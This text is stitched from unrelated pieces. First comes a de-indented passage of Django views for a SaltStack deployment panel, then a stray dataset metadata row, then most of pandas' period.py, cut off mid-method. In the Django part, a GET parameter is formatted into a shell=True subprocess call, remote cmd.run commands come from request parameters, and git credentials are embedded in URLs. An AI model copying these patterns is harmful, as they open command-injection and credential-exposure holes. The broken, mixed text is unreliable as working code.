if request.POST.get('get_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
else:
tgt_select = request.POST.get('tgt_select')
cur_path = request.POST.get('rollback_list', None)
file_tag = request.POST.get('rollback_remark', None)
rollback_history_remark = FileRollback.objects.filter(cur_path=cur_path).filter(file_tag=file_tag)\
.filter(target=tgt_select)
for r in rollback_history_remark:
r_list.append(r.remark)
return HttpResponse(json.dumps(r_list))
else:
if request.POST.get('check_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
expr_form = 'nodegroup'
else:
tgt_select = request.POST.get('tgt_select')
expr_form = 'list'
remote_path = request.POST.get('remote_path')
file_tag = request.POST.get('tag')
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
file_tag_new = '%s%s' % (request.user.id, datetime.datetime.now().strftime('%j%Y%m%d%H%M%S'))
                    # back up the current remote file before rolling back
ret_bak = sapi.file_manage(tgt_select, 'file_bakup.Backup', remote_path, file_tag_new, None, expr_form)
                    # perform the rollback
ret = sapi.file_manage(tgt_select, 'file_bakup.Rollback', remote_path, file_tag, None, expr_form)
rst = ''
for k in ret:
rst = rst + u'主机:' + k + '\n回滚结果:\n' + ret[k] + '\n' + '-'*80 + '\n'
Message.objects.create(type=u'文件管理', user=request.user.first_name, action=u'文件回滚', action_ip=UserIP(request),content=u'文件回滚 %s'%rst)
return HttpResponse(json.dumps(rst))
else:
raise Http404
@login_required
def salt_task_list(request):
'''
    List the current user's deployment task history.
'''
if request.user.has_perm('userperm.view_message'):
if request.method == 'GET':
if request.GET.has_key('tid'):
tid = request.get_full_path().split('=')[1]
log_detail = Message.objects.filter(user=request.user.first_name).filter(id=tid).exclude(type=u'用户登录').exclude(type=u'用户退出')
return render(request, 'salt_task_detail.html', {'log_detail':log_detail})
logs = Message.objects.filter(user=request.user.first_name).exclude(type=u'用户登录').exclude(type=u'用户退出')[:200]
return render(request, 'salt_task_list.html', {'all_logs':logs})
else:
raise Http404
@login_required
def salt_task_check(request):
'''
    Render the task query page.
'''
return render(request, 'salt_task_check.html', {})
@login_required
def salt_task_running(request):
'''
    List currently running salt jobs, or kill one by jid.
'''
ret = []
if request.method == 'POST':
if request.user.has_perms(['userperm.view_message', 'deploy.edit_deploy']):
if request.is_ajax():
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
rst = sapi.salt_running_jobs()
for k,v in rst.items():
dict={}
dict['jid'] = k
dict['func'] = v['Function']
dict['tgt_type'] = v['Target-type']
dict['running'] = v['Arguments'][0].replace(';echo ":::"$?','')
str_tgt = ''
for i in v['Running']:
for m,n in i.items():
str_tgt = str_tgt + m + ':' + str(n) + '<br />'
dict['tgt_pid'] = str_tgt
ret.append(dict)
return HttpResponse(json.dumps(ret))
if request.GET.has_key('delete'):
jid = request.GET.get('jid')
import subprocess
p=subprocess.Popen("salt '*' saltutil.term_job %s"%jid, shell=True, stdout=subprocess.PIPE)
out=p.stdout.readlines()
return HttpResponse(json.dumps('Job %s killed.'%jid))
return render(request, 'salt_task_running_list.html', {})
@login_required
def project_list(request):
'''
    List projects visible to the current user.
'''
if request.user.has_perm('deploy.view_project'):
if request.user.is_superuser:
project_list = Project.objects.all()
else:
user_group = User.objects.get(pk=request.user.id).group.all()
for g in user_group:
project_list = Project.objects.filter(user_group=g)
return render(request, 'salt_project_list.html', {'projects':project_list})
else:
raise Http404
@login_required
def project_manage(request, id=None):
'''
    Create, edit or delete a project and maintain its rsync exclude list.
    :param request: HTTP request
    :param id: project primary key (None when creating)
    :return: rendered page or redirect
'''
rsync_conf = './media/salt/rsync'
if request.user.has_perm('deploy.view_project'):
content = ''
if id:
project = get_object_or_404(Project, pk=id)
action = 'edit'
page_name = '编辑项目'
try:
with open('%s/%s.list' % (rsync_conf, project.name), 'r') as f:
content = f.read()
except:
pass
else:
project = Project()
action = 'add'
page_name = '新增项目'
if request.method == 'GET':
if request.GET.has_key('delete'):
id = request.GET.get('id')
project = get_object_or_404(Project, pk=id)
project.delete()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=u'删除项目',
action_ip=UserIP(request), content=u'删除项目 %s' % project.pname)
return redirect('project_list')
if request.method == 'POST':
form = ProjectForm(request.user, request.POST, instance=project)
if form.is_valid():
if action == 'add':
project = form.save(commit=False)
project.user = request.user
else:
form.save
project.name = form.cleaned_data['src'].split('/')[-1].replace('.git', '')
project.save()
exclude = request.POST.get('exclude')
try:
if not os.path.isdir(rsync_conf):
os.makedirs(rsync_conf)
with open('%s/%s.list'%(rsync_conf,project.name),'w') as f:
f.write(exclude)
except:
pass
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=page_name,
action_ip=UserIP(request), content='%s %s' % (page_name, project.pname))
return redirect('project_list')
else:
form = ProjectForm(request.user, instance=project)
return render(request, 'salt_project_manage.html', {'form':form, 'action':action, 'page_name':page_name, 'aid':id, 'content':content})
else:
raise Http404
@login_required
def project_deploy(request):
'''
    Deploy a project: init, update, roll back, manage backups and start/stop/restart its process.
    :param request: HTTP request
    :return: JSON result for ajax calls, otherwise a redirect to the project list
'''
if request.user.has_perm('deploy.edit_project'):
if request.method == 'GET':
if request.is_ajax():
id = request.GET.get('id')
env = request.GET.get('env')
project = Project.objects.get(pk=id)
if env == '0':
tgt_list = project.salt_test
elif env == '1':
tgt_list = project.salt_group
else:
pass
if tgt_list == '0':
ret = {u'发布异常':{'result':u'请确认是否配置测试/正式环境'}}
if request.GET.has_key('get_rollback'):
ret = {'-1': u'请确认是否配置测试/正式环境'}
return HttpResponse(json.dumps(ret))
expr_form = 'nodegroup'
action = ''
url = project.src.split('//')
sapi = SaltAPI(url=settings.SALT_API['url'], username=settings.SALT_API['user'],
password=settings.SALT_API['password'])
dtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
ret = sapi.file_copy(tgt_list, 'cp.get_file', 'salt://rsync/%s.list' % project.name,
'/srv/salt/%s.list' % project.name, 'nodegroup')
if request.GET.has_key('init'):
action = u'初始化项目'
ret = sapi.project_manage(tgt_list, 'project_manage.ProjectSync', project.name,
'%s//%s:%s@%s' % (url[0], project.src_user, project.src_passwd, url[1]),
project.path, 'init', dtime, expr_form)
if request.GET.has_key('update'):
action = u'更新项目'
try:
ret = sapi.project_manage(tgt_list, 'project_manage.ProjectSync', project.name,
'%s//%s:%s@%s' % (url[0], project.src_user, project.src_passwd, url[1]),
project.path, 'update', dtime, expr_form)
for _, v in ret.items():
if v['tag']:
ProjectRollback.objects.create(name=project, tag=v['tag'], env=env)
break
except:
ret = {u'更新异常':{'result':u'更新失败,检查项目是否发布'}}
if request.GET.has_key('get_rollback'):
action = u'获取备份'
ret = {i['pk']: i['tag'] for i in
ProjectRollback.objects.filter(name=id).filter(env=env).values('pk', 'tag')}
if not ret:
ret = {'0':'No backup found.'}
if request.GET.has_key('rollback_delete'):
action = u'删除备份'
tag = request.GET.get('tag')
enforce = request.GET.get('enforce')
ret = sapi.project_manage(tgt_list, 'project_manage.ProjectClean', project.name, tag,
project.path, 'delete', dtime, expr_form)
for _, v in ret.items():
if v['tag'] or enforce == '1':
ProjectRollback.objects.get(name=project, tag=tag, env=env).delete()
break
if request.GET.has_key('rollback'):
action = u'回滚项目'
tag = request.GET.get('tag')
ret = sapi.project_manage(tgt_list, 'project_manage.ProjectRollback', project.name, tag,
project.path, 'rollback', dtime, expr_form)
if request.GET.has_key('start'):
action = u'启动进程'
tag = request.GET.get('tag')
if tag:
ret = ProjectExec(sapi, tgt_list, 'cmd.run', tag, expr_form)
else:
ret = {u'进程管理': {'result': u'未配置启动项'}}
if request.GET.has_key('reload'):
action = u'重启进程'
tag = request.GET.get('tag')
if tag:
ret = ProjectExec(sapi, tgt_list, 'cmd.run', tag, expr_form)
else:
ret = {u'进程管理': {'result': u'未配置重启项'}}
if request.GET.has_key('stop'):
action = u'停止进程'
tag = request.GET.get('tag')
if tag:
ret = ProjectExec(sapi, tgt_list, 'cmd.run', tag, expr_form)
else:
ret = {u'进程管理': {'result': u'未配置停止项'}}
Message.objects.create(type=u'项目管理', user=request.user.first_name, action=action,
action_ip=UserIP(request), content='%s %s' % (project.pname, ret))
return HttpResponse(json.dumps(ret))
return redirect(project_list)
else:
raise Http404
def page_test(request):
return render(request,"page_test.html") | 41.697901 | 172 | 0.482912 |
4a224d4e6ee7f15865aea6aa55b6a7268427fdde | 44,284 | py | Python | pandas/core/indexes/period.py | mapehe/pandas | 8ddc0fd801d794fcd7735816790dff66d1c678e2 | [
"BSD-3-Clause"
] | 2 | 2021-01-13T09:40:44.000Z | 2021-01-13T09:40:52.000Z | pandas/core/indexes/period.py | mapehe/pandas | 8ddc0fd801d794fcd7735816790dff66d1c678e2 | [
"BSD-3-Clause"
] | null | null | null | pandas/core/indexes/period.py | mapehe/pandas | 8ddc0fd801d794fcd7735816790dff66d1c678e2 | [
"BSD-3-Clause"
] | null | null | null | # pylint: disable=E1101,E1103,W0232
from datetime import datetime, timedelta
import numpy as np
import warnings
from pandas.core import common as com
from pandas.core.dtypes.common import (
is_integer,
is_float,
is_integer_dtype,
is_float_dtype,
is_scalar,
is_datetime64_dtype,
is_datetime64_any_dtype,
is_period_dtype,
is_bool_dtype,
pandas_dtype,
_ensure_object)
from pandas.core.dtypes.dtypes import PeriodDtype
from pandas.core.dtypes.generic import ABCSeries
import pandas.tseries.frequencies as frequencies
from pandas.tseries.frequencies import get_freq_code as _gfc
from pandas.tseries.offsets import Tick, DateOffset
from pandas.core.indexes.datetimes import DatetimeIndex, Int64Index, Index
from pandas.core.indexes.datetimelike import DatelikeOps, DatetimeIndexOpsMixin
from pandas.core.tools.datetimes import parse_time_string
from pandas._libs.lib import infer_dtype
from pandas._libs import tslib, index as libindex
from pandas._libs.tslibs.period import (Period, IncompatibleFrequency,
get_period_field_arr,
_validate_end_alias, _quarter_to_myear)
from pandas._libs.tslibs.fields import isleapyear_arr
from pandas._libs.tslibs import resolution, period
from pandas._libs.tslibs.timedeltas import delta_to_nanoseconds
from pandas.core.base import _shared_docs
from pandas.core.indexes.base import _index_shared_docs, _ensure_index
from pandas import compat
from pandas.util._decorators import (Appender, Substitution, cache_readonly,
deprecate_kwarg)
from pandas.compat import zip, u
import pandas.core.indexes.base as ibase
_index_doc_kwargs = dict(ibase._index_doc_kwargs)
_index_doc_kwargs.update(
dict(target_klass='PeriodIndex or list of Periods'))
def _field_accessor(name, alias, docstring=None):
def f(self):
base, mult = _gfc(self.freq)
result = get_period_field_arr(alias, self._ndarray_values, base)
return Index(result, name=self.name)
f.__name__ = name
f.__doc__ = docstring
return property(f)
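# Illustrative use: PeriodIndex wires its field properties through this factory,
# e.g. something like ``year = _field_accessor('year', 0, ...)``, so that
# ``PeriodIndex(['2019', '2020'], freq='A').year`` yields an integer
# Index([2019, 2020]).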
def dt64arr_to_periodarr(data, freq, tz):
if data.dtype != np.dtype('M8[ns]'):
raise ValueError('Wrong dtype: %s' % data.dtype)
freq = Period._maybe_convert_freq(freq)
base, mult = _gfc(freq)
return period.dt64arr_to_periodarr(data.view('i8'), base, tz)
# --- Period index sketch
_DIFFERENT_FREQ_INDEX = period._DIFFERENT_FREQ_INDEX
def _period_index_cmp(opname, cls):
"""
Wrap comparison operations to convert Period-like to PeriodDtype
"""
nat_result = True if opname == '__ne__' else False
def wrapper(self, other):
op = getattr(self._ndarray_values, opname)
if isinstance(other, Period):
if other.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
result = op(other.ordinal)
elif isinstance(other, PeriodIndex):
if other.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
result = op(other._ndarray_values)
mask = self._isnan | other._isnan
if mask.any():
result[mask] = nat_result
return result
elif other is tslib.NaT:
result = np.empty(len(self._ndarray_values), dtype=bool)
result.fill(nat_result)
else:
other = Period(other, freq=self.freq)
result = op(other.ordinal)
if self.hasnans:
result[self._isnan] = nat_result
return result
return compat.set_function_name(wrapper, opname, cls)
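# Added illustrative note (not part of the original module): the comparison
# methods built by _period_index_cmp only accept operands whose frequency
# matches the index; a mismatched Period raises IncompatibleFrequency. The
# values below are assumptions chosen only for the example.
# >>> pd.PeriodIndex(['2020Q1'], freq='Q') == pd.Period('2020-01', freq='M')
# ... raises IncompatibleFrequency because 'Q-DEC' != 'M'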
def _new_PeriodIndex(cls, **d):
# GH13277 for unpickling
if d['data'].dtype == 'int64':
values = d.pop('data')
return cls._from_ordinals(values=values, **d)
class PeriodIndex(DatelikeOps, DatetimeIndexOpsMixin, Int64Index):
"""
Immutable ndarray holding ordinal values indicating regular periods in
time such as particular years, quarters, months, etc.
    Index keys are boxed to Period objects which carry the metadata (e.g.,
frequency information).
Parameters
----------
data : array-like (1-dimensional), optional
Optional period-like data to construct index with
copy : bool
Make a copy of input ndarray
freq : string or period object, optional
One of pandas period strings or corresponding objects
start : starting value, period-like, optional
If data is None, used as the start point in generating regular
period data.
periods : int, optional, > 0
Number of periods to generate, if generating index. Takes precedence
over end argument
end : end value, period-like, optional
If periods is none, generated index will extend to first conforming
period on or just past end argument
year : int, array, or Series, default None
month : int, array, or Series, default None
quarter : int, array, or Series, default None
day : int, array, or Series, default None
hour : int, array, or Series, default None
minute : int, array, or Series, default None
second : int, array, or Series, default None
tz : object, default None
Timezone for converting datetime64 data to Periods
dtype : str or PeriodDtype, default None
Attributes
----------
day
dayofweek
dayofyear
days_in_month
daysinmonth
end_time
freq
freqstr
hour
is_leap_year
minute
month
quarter
qyear
second
start_time
week
weekday
weekofyear
year
Methods
-------
asfreq
strftime
to_timestamp
tz_convert
tz_localize
Examples
--------
>>> idx = PeriodIndex(year=year_arr, quarter=q_arr)
>>> idx2 = PeriodIndex(start='2000', end='2010', freq='A')
See Also
---------
Index : The base pandas Index type
Period : Represents a period of time
DatetimeIndex : Index with datetime64 data
TimedeltaIndex : Index of timedelta64 data
"""
_typ = 'periodindex'
_attributes = ['name', 'freq']
# define my properties & methods for delegation
_other_ops = []
_bool_ops = ['is_leap_year']
_object_ops = ['start_time', 'end_time', 'freq']
_field_ops = ['year', 'month', 'day', 'hour', 'minute', 'second',
'weekofyear', 'weekday', 'week', 'dayofweek',
'dayofyear', 'quarter', 'qyear',
'days_in_month', 'daysinmonth']
_datetimelike_ops = _field_ops + _object_ops + _bool_ops
_datetimelike_methods = ['strftime', 'to_timestamp', 'asfreq']
_is_numeric_dtype = False
_infer_as_myclass = True
freq = None
_engine_type = libindex.PeriodEngine
@classmethod
def _add_comparison_methods(cls):
""" add in comparison methods """
cls.__eq__ = _period_index_cmp('__eq__', cls)
cls.__ne__ = _period_index_cmp('__ne__', cls)
cls.__lt__ = _period_index_cmp('__lt__', cls)
cls.__gt__ = _period_index_cmp('__gt__', cls)
cls.__le__ = _period_index_cmp('__le__', cls)
cls.__ge__ = _period_index_cmp('__ge__', cls)
def __new__(cls, data=None, ordinal=None, freq=None, start=None, end=None,
periods=None, tz=None, dtype=None, copy=False, name=None,
**fields):
valid_field_set = {'year', 'month', 'day', 'quarter',
'hour', 'minute', 'second'}
if not set(fields).issubset(valid_field_set):
raise TypeError('__new__() got an unexpected keyword argument {}'.
format(list(set(fields) - valid_field_set)[0]))
if periods is not None:
if is_float(periods):
periods = int(periods)
elif not is_integer(periods):
msg = 'periods must be a number, got {periods}'
raise TypeError(msg.format(periods=periods))
if name is None and hasattr(data, 'name'):
name = data.name
if dtype is not None:
dtype = pandas_dtype(dtype)
if not is_period_dtype(dtype):
raise ValueError('dtype must be PeriodDtype')
if freq is None:
freq = dtype.freq
elif freq != dtype.freq:
msg = 'specified freq and dtype are different'
raise IncompatibleFrequency(msg)
# coerce freq to freq object, otherwise it can be coerced elementwise
# which is slow
if freq:
freq = Period._maybe_convert_freq(freq)
if data is None:
if ordinal is not None:
data = np.asarray(ordinal, dtype=np.int64)
else:
data, freq = cls._generate_range(start, end, periods,
freq, fields)
return cls._from_ordinals(data, name=name, freq=freq)
if isinstance(data, PeriodIndex):
if freq is None or freq == data.freq: # no freq change
freq = data.freq
data = data._ndarray_values
else:
base1, _ = _gfc(data.freq)
base2, _ = _gfc(freq)
data = period.period_asfreq_arr(data._ndarray_values,
base1, base2, 1)
return cls._simple_new(data, name=name, freq=freq)
# not array / index
if not isinstance(data, (np.ndarray, PeriodIndex,
DatetimeIndex, Int64Index)):
if is_scalar(data) or isinstance(data, Period):
cls._scalar_data_error(data)
# other iterable of some kind
if not isinstance(data, (list, tuple)):
data = list(data)
data = np.asarray(data)
# datetime other than period
if is_datetime64_dtype(data.dtype):
data = dt64arr_to_periodarr(data, freq, tz)
return cls._from_ordinals(data, name=name, freq=freq)
# check not floats
if infer_dtype(data) == 'floating' and len(data) > 0:
raise TypeError("PeriodIndex does not allow "
"floating point in construction")
# anything else, likely an array of strings or periods
data = _ensure_object(data)
freq = freq or period.extract_freq(data)
data = period.extract_ordinals(data, freq)
return cls._from_ordinals(data, name=name, freq=freq)
@cache_readonly
def _engine(self):
return self._engine_type(lambda: self, len(self))
@classmethod
def _generate_range(cls, start, end, periods, freq, fields):
if freq is not None:
freq = Period._maybe_convert_freq(freq)
field_count = len(fields)
if com._count_not_none(start, end) > 0:
if field_count > 0:
raise ValueError('Can either instantiate from fields '
'or endpoints, but not both')
subarr, freq = _get_ordinal_range(start, end, periods, freq)
elif field_count > 0:
subarr, freq = _range_from_fields(freq=freq, **fields)
else:
raise ValueError('Not enough parameters to construct '
'Period range')
return subarr, freq
@classmethod
def _simple_new(cls, values, name=None, freq=None, **kwargs):
"""
Values can be any type that can be coerced to Periods.
Ordinals in an ndarray are fastpath-ed to `_from_ordinals`
"""
if not is_integer_dtype(values):
values = np.array(values, copy=False)
if len(values) > 0 and is_float_dtype(values):
raise TypeError("PeriodIndex can't take floats")
return cls(values, name=name, freq=freq, **kwargs)
return cls._from_ordinals(values, name, freq, **kwargs)
@classmethod
def _from_ordinals(cls, values, name=None, freq=None, **kwargs):
"""
Values should be int ordinals
        `__new__` & `_simple_new` coerce to ordinals and call this method
"""
values = np.array(values, dtype='int64', copy=False)
result = object.__new__(cls)
result._data = values
result.name = name
if freq is None:
raise ValueError('freq is not specified and cannot be inferred')
result.freq = Period._maybe_convert_freq(freq)
result._reset_identity()
return result
def _shallow_copy_with_infer(self, values=None, **kwargs):
""" we always want to return a PeriodIndex """
return self._shallow_copy(values=values, **kwargs)
def _shallow_copy(self, values=None, freq=None, **kwargs):
if freq is None:
freq = self.freq
if values is None:
values = self._ndarray_values
return super(PeriodIndex, self)._shallow_copy(values=values,
freq=freq, **kwargs)
def _coerce_scalar_to_index(self, item):
"""
we need to coerce a scalar to a compat for our index type
Parameters
----------
item : scalar item to coerce
"""
return PeriodIndex([item], **self._get_attributes_dict())
@Appender(_index_shared_docs['__contains__'])
def __contains__(self, key):
if isinstance(key, Period):
if key.freq != self.freq:
return False
else:
return key.ordinal in self._engine
else:
try:
self.get_loc(key)
return True
except Exception:
return False
return False
contains = __contains__
@property
def asi8(self):
return self._ndarray_values.view('i8')
@cache_readonly
def _int64index(self):
return Int64Index(self.asi8, name=self.name, fastpath=True)
@property
def values(self):
return self.astype(object).values
@property
def _ndarray_values(self):
# Ordinals
return self._data
def __array__(self, dtype=None):
if is_integer_dtype(dtype):
return self.asi8
else:
return self.astype(object).values
def __array_wrap__(self, result, context=None):
"""
Gets called after a ufunc. Needs additional handling as
PeriodIndex stores internal data as int dtype
        This should be replaced with __numpy_ufunc__ in a future version
"""
if isinstance(context, tuple) and len(context) > 0:
func = context[0]
if (func is np.add):
pass
elif (func is np.subtract):
name = self.name
left = context[1][0]
right = context[1][1]
if (isinstance(left, PeriodIndex) and
isinstance(right, PeriodIndex)):
name = left.name if left.name == right.name else None
return Index(result, name=name)
elif isinstance(left, Period) or isinstance(right, Period):
return Index(result, name=name)
elif isinstance(func, np.ufunc):
if 'M->M' not in func.types:
msg = "ufunc '{0}' not supported for the PeriodIndex"
# This should be TypeError, but TypeError cannot be raised
# from here because numpy catches.
raise ValueError(msg.format(func.__name__))
if is_bool_dtype(result):
return result
# the result is object dtype array of Period
# cannot pass _simple_new as it is
return self._shallow_copy(result, freq=self.freq, name=self.name)
@property
def _box_func(self):
return lambda x: Period._from_ordinal(ordinal=x, freq=self.freq)
def _to_embed(self, keep_tz=False, dtype=None):
"""
return an array repr of this object, potentially casting to object
"""
if dtype is not None:
return self.astype(dtype)._to_embed(keep_tz=keep_tz)
return self.astype(object).values
@property
def size(self):
# Avoid materializing self._values
return self._ndarray_values.size
@property
def shape(self):
# Avoid materializing self._values
return self._ndarray_values.shape
@property
def _formatter_func(self):
return lambda x: "'%s'" % x
def asof_locs(self, where, mask):
"""
where : array of timestamps
mask : array of booleans where data is not NA
"""
where_idx = where
if isinstance(where_idx, DatetimeIndex):
where_idx = PeriodIndex(where_idx.values, freq=self.freq)
locs = self._ndarray_values[mask].searchsorted(
where_idx._ndarray_values, side='right')
locs = np.where(locs > 0, locs - 1, 0)
result = np.arange(len(self))[mask].take(locs)
first = mask.argmax()
result[(locs == 0) & (where_idx._ndarray_values <
self._ndarray_values[first])] = -1
return result
@Appender(_index_shared_docs['astype'])
def astype(self, dtype, copy=True, how='start'):
dtype = pandas_dtype(dtype)
if is_integer_dtype(dtype):
return self._int64index.copy() if copy else self._int64index
elif is_datetime64_any_dtype(dtype):
tz = getattr(dtype, 'tz', None)
return self.to_timestamp(how=how).tz_localize(tz)
elif is_period_dtype(dtype):
return self.asfreq(freq=dtype.freq)
return super(PeriodIndex, self).astype(dtype, copy=copy)
@Substitution(klass='PeriodIndex')
@Appender(_shared_docs['searchsorted'])
@deprecate_kwarg(old_arg_name='key', new_arg_name='value')
def searchsorted(self, value, side='left', sorter=None):
if isinstance(value, Period):
if value.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, value.freqstr)
raise IncompatibleFrequency(msg)
value = value.ordinal
elif isinstance(value, compat.string_types):
value = Period(value, freq=self.freq).ordinal
return self._ndarray_values.searchsorted(value, side=side,
sorter=sorter)
@property
def is_all_dates(self):
return True
@property
def is_full(self):
"""
        Returns True if there are no missing periods from start to end
"""
if len(self) == 0:
return True
if not self.is_monotonic:
raise ValueError('Index is not monotonic')
values = self.values
return ((values[1:] - values[:-1]) < 2).all()
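    # Added illustrative sketch (not original source): is_full is True only
    # when no period is missing between the first and last entries. The index
    # values below are assumptions for the example.
    # >>> pd.PeriodIndex(['2018-01', '2018-02', '2018-03'], freq='M').is_full
    # True
    # >>> pd.PeriodIndex(['2018-01', '2018-03'], freq='M').is_full
    # False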
def asfreq(self, freq=None, how='E'):
"""
Convert the PeriodIndex to the specified frequency `freq`.
Parameters
----------
freq : str
a frequency
how : str {'E', 'S'}
'E', 'END', or 'FINISH' for end,
'S', 'START', or 'BEGIN' for start.
Whether the elements should be aligned to the end
        or start within the period. January 31st ('END') vs.
        January 1st ('START') for example.
Returns
-------
new : PeriodIndex with the new frequency
Examples
--------
>>> pidx = pd.period_range('2010-01-01', '2015-01-01', freq='A')
>>> pidx
<class 'pandas.core.indexes.period.PeriodIndex'>
[2010, ..., 2015]
Length: 6, Freq: A-DEC
>>> pidx.asfreq('M')
<class 'pandas.core.indexes.period.PeriodIndex'>
[2010-12, ..., 2015-12]
Length: 6, Freq: M
>>> pidx.asfreq('M', how='S')
<class 'pandas.core.indexes.period.PeriodIndex'>
[2010-01, ..., 2015-01]
Length: 6, Freq: M
"""
how = _validate_end_alias(how)
freq = Period._maybe_convert_freq(freq)
base1, mult1 = _gfc(self.freq)
base2, mult2 = _gfc(freq)
asi8 = self.asi8
# mult1 can't be negative or 0
end = how == 'E'
if end:
ordinal = asi8 + mult1 - 1
else:
ordinal = asi8
new_data = period.period_asfreq_arr(ordinal, base1, base2, end)
if self.hasnans:
new_data[self._isnan] = tslib.iNaT
return self._simple_new(new_data, self.name, freq=freq)
year = _field_accessor('year', 0, "The year of the period")
month = _field_accessor('month', 3, "The month as January=1, December=12")
day = _field_accessor('day', 4, "The days of the period")
hour = _field_accessor('hour', 5, "The hour of the period")
minute = _field_accessor('minute', 6, "The minute of the period")
second = _field_accessor('second', 7, "The second of the period")
weekofyear = _field_accessor('week', 8, "The week ordinal of the year")
week = weekofyear
dayofweek = _field_accessor('dayofweek', 10,
"The day of the week with Monday=0, Sunday=6")
weekday = dayofweek
dayofyear = day_of_year = _field_accessor('dayofyear', 9,
"The ordinal day of the year")
quarter = _field_accessor('quarter', 2, "The quarter of the date")
qyear = _field_accessor('qyear', 1)
days_in_month = _field_accessor('days_in_month', 11,
"The number of days in the month")
daysinmonth = days_in_month
@property
def is_leap_year(self):
""" Logical indicating if the date belongs to a leap year """
return isleapyear_arr(np.asarray(self.year))
@property
def start_time(self):
return self.to_timestamp(how='start')
@property
def end_time(self):
return self.to_timestamp(how='end')
def _mpl_repr(self):
# how to represent ourselves to matplotlib
return self.astype(object).values
def to_timestamp(self, freq=None, how='start'):
"""
Cast to DatetimeIndex
Parameters
----------
freq : string or DateOffset, optional
Target frequency. The default is 'D' for week or longer,
'S' otherwise
how : {'s', 'e', 'start', 'end'}
Returns
-------
DatetimeIndex
"""
how = _validate_end_alias(how)
if freq is None:
base, mult = _gfc(self.freq)
freq = frequencies.get_to_timestamp_base(base)
else:
freq = Period._maybe_convert_freq(freq)
base, mult = _gfc(freq)
new_data = self.asfreq(freq, how)
new_data = period.periodarr_to_dt64arr(new_data._ndarray_values, base)
return DatetimeIndex(new_data, freq='infer', name=self.name)
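    # Added illustrative sketch (not original source): to_timestamp converts
    # each period into a Timestamp anchored at its start (or end). The index
    # values below are assumptions for the example.
    # >>> pidx = pd.PeriodIndex(['2019-01', '2019-02'], freq='M')
    # >>> pidx.to_timestamp(how='start')  # timestamps 2019-01-01, 2019-02-01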
def _maybe_convert_timedelta(self, other):
if isinstance(
other, (timedelta, np.timedelta64, Tick, np.ndarray)):
offset = frequencies.to_offset(self.freq.rule_code)
if isinstance(offset, Tick):
if isinstance(other, np.ndarray):
nanos = np.vectorize(delta_to_nanoseconds)(other)
else:
nanos = delta_to_nanoseconds(other)
offset_nanos = delta_to_nanoseconds(offset)
check = np.all(nanos % offset_nanos == 0)
if check:
return nanos // offset_nanos
elif isinstance(other, DateOffset):
freqstr = other.rule_code
base = frequencies.get_base_alias(freqstr)
if base == self.freq.rule_code:
return other.n
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
elif is_integer(other):
# integer is passed to .shift via
# _add_datetimelike_methods basically
# but ufunc may pass integer to _add_delta
return other
# raise when input doesn't have freq
msg = "Input has different freq from PeriodIndex(freq={0})"
raise IncompatibleFrequency(msg.format(self.freqstr))
def _add_offset(self, other):
assert not isinstance(other, Tick)
base = frequencies.get_base_alias(other.rule_code)
if base != self.freq.rule_code:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
return self.shift(other.n)
def _add_delta_td(self, other):
assert isinstance(other, (timedelta, np.timedelta64, Tick))
nanos = delta_to_nanoseconds(other)
own_offset = frequencies.to_offset(self.freq.rule_code)
if isinstance(own_offset, Tick):
offset_nanos = delta_to_nanoseconds(own_offset)
if np.all(nanos % offset_nanos == 0):
return self.shift(nanos // offset_nanos)
# raise when input doesn't have freq
raise IncompatibleFrequency("Input has different freq from "
"{cls}(freq={freqstr})"
.format(cls=type(self).__name__,
freqstr=self.freqstr))
def _add_delta(self, other):
ordinal_delta = self._maybe_convert_timedelta(other)
return self.shift(ordinal_delta)
def _sub_datelike(self, other):
assert other is not tslib.NaT
return NotImplemented
def _sub_period(self, other):
if self.freq != other.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
asi8 = self.asi8
new_data = asi8 - other.ordinal
if self.hasnans:
new_data = new_data.astype(np.float64)
new_data[self._isnan] = np.nan
# result must be Int64Index or Float64Index
return Index(new_data)
def shift(self, n):
"""
        Specialized shift which produces a PeriodIndex
Parameters
----------
n : int
Periods to shift by
Returns
-------
shifted : PeriodIndex
"""
values = self._ndarray_values + n * self.freq.n
if self.hasnans:
values[self._isnan] = tslib.iNaT
return self._shallow_copy(values=values)
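    # Added illustrative sketch (not original source): shift moves every
    # element by n units of the index's own frequency. Example values are
    # assumptions.
    # >>> pd.PeriodIndex(['2020-01', '2020-02'], freq='M').shift(1)
    # ... yields periods 2020-02 and 2020-03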
@cache_readonly
def dtype(self):
return PeriodDtype.construct_from_string(self.freq)
@property
def inferred_type(self):
# b/c data is represented as ints make sure we can't have ambiguous
# indexing
return 'period'
def get_value(self, series, key):
"""
Fast lookup of value from 1-dimensional ndarray. Only use this if you
know what you're doing
"""
s = com._values_from_object(series)
try:
return com._maybe_box(self,
super(PeriodIndex, self).get_value(s, key),
series, key)
except (KeyError, IndexError):
try:
asdt, parsed, reso = parse_time_string(key, self.freq)
grp = resolution.Resolution.get_freq_group(reso)
freqn = resolution.get_freq_group(self.freq)
vals = self._ndarray_values
# if our data is higher resolution than requested key, slice
if grp < freqn:
iv = Period(asdt, freq=(grp, 1))
ord1 = iv.asfreq(self.freq, how='S').ordinal
ord2 = iv.asfreq(self.freq, how='E').ordinal
if ord2 < vals[0] or ord1 > vals[-1]:
raise KeyError(key)
pos = np.searchsorted(self._ndarray_values, [ord1, ord2])
key = slice(pos[0], pos[1] + 1)
return series[key]
elif grp == freqn:
key = Period(asdt, freq=self.freq).ordinal
return com._maybe_box(self, self._engine.get_value(s, key),
series, key)
else:
raise KeyError(key)
